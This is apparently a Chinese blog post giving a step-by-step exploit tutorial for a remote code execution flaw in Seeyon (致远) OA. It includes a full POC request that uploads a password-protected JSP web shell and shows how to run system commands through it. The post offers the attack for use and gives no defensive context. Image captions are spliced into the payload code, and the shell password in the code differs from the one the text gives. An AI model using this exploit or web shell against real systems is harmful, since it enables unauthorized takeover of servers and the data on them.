登陆 注册

致远OA漏洞教程+POC

Admin 2020-03-26 19人围观 ,发现0个评论 致远OA漏洞

验证漏洞若 http://www.yir6.cn/seeyon/htmlofficeservlet回显DBSTEP V3.0     0               21              0               htmoffice operate err

致远OA漏洞教程+POC Web安全 第1张

则说明存在漏洞Rce 验证浏览器访问xx.xxx/seeyon/htmlofficeservlet

致远OA漏洞教程+POC Web安全 第2张

然后通过BP抓包注意这里的请求方式需要更换成post(抓包后右键从上往下第11个)然后发送到repeart(右键从上往下第四个  ctrl+R)

致远OA漏洞教程+POC Web安全 第3张

然后在repeater开始改包(只留下这四行,其余都删除,然后加POC)POST /scan HTTP/1.1Host: xxx.xxx.xxxContent-Length: xxxUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)+POC  (poc在下面)

致远OA漏洞教程+POC Web安全 第4张

然后访问http://xxx.xxx/seeyon/test123456.jsp若出现:-) 则验证成功http://xxx.xxx/seeyon/test123456.jsp为shell路径  密码asasd3344直接执行命令xxxx.xxx//seeyon/test123456.jsp?pwd=asasd3344&cmd=cmd+/c+whoami

致远OA漏洞教程+POC Web安全 第5张

POC:

DBSTEP V3.0     355             0               666             DBSTEP=OKMLlKlV
OPTION=S3WYOSWLBSGr
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
CREATEDATE=wUghPB3szB3Xwg66
RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6
originalFileId=wV66
originalCreateDate=wUghPB3szB3Xwg66
FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
needReadFile=yRWZdAS6
originalCreateDate=wLSGP4oEzLKAz4=iz=66
<%@ page language="java" import="java.util.*,致远OA漏洞教程+POC Web安全 第6张java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %><%if("asasd33445".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd")) + "</pre>");}else{out.println(":-)");}%>6e4f045d4b8506bf492ada7e3390d7ce

请发表您的评论
蚁人QQ二维码
蚁人QQ二维码
不容错过
Powered By 蚁人博客